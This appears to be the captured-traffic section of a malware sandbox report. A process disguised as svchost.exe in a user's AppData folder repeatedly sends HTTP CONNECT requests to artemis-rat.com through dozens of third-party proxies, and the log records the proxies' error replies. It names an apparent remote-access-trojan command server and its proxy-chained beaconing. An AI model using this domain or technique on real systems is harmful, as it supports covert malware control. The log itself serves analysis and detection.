                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2307192.168.2.55725143.131.248.1651567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.716485023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2308192.168.2.556269148.72.215.2304438743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.716571093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.547861099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2309192.168.2.557264110.12.211.1408043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.718755007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2310192.168.2.557417162.241.50.1794815643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.724364996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.333626032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.943074942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.146374941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.537059069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.942730904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2311192.168.2.55725543.155.130.1821567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.724594116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2312192.168.2.55724693.90.212.2415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.726768017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2313192.168.2.557263156.67.217.1598043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.734330893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.065337896 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2314192.168.2.55729751.210.223.9300043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.748814106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2315192.168.2.557479162.159.242.1588043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.754405022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.915501118 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2316192.168.2.557277185.81.153.162338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.763694048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2317192.168.2.55732260.188.102.2251808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.766731024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2318192.168.2.557494104.16.81.768043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.767508984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.921766996 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2319192.168.2.55733860.246.122.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.774931908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2320192.168.2.55729839.105.27.30312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.777338028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.143270016 CET38INHTTP/1.1 200 OK
                                                                                    content-length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2321192.168.2.557513172.67.35.158043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.777667999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.931878090 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2322192.168.2.557327150.109.243.1561567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.778357029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2323192.168.2.557281101.133.175.251312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.778844118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.645768881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.833743095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.942864895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146334887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2324192.168.2.556355194.233.78.1423551343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.784127951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.442672014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.146583080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2325192.168.2.557375158.255.215.501699343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.789622068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.129606009 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2326192.168.2.557201117.160.250.1338043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.791979074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.320293903 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2327192.168.2.5573078.219.177.1341567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.795691013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2328192.168.2.55728447.106.112.207808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.805583954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.170269966 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                    Mar 9, 2024 13:14:30.171813011 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2329192.168.2.55735947.56.110.204898943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.805671930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.121834993 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.16.1
                                                                                    Date: Sat, 09 Mar 2024 11:59:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
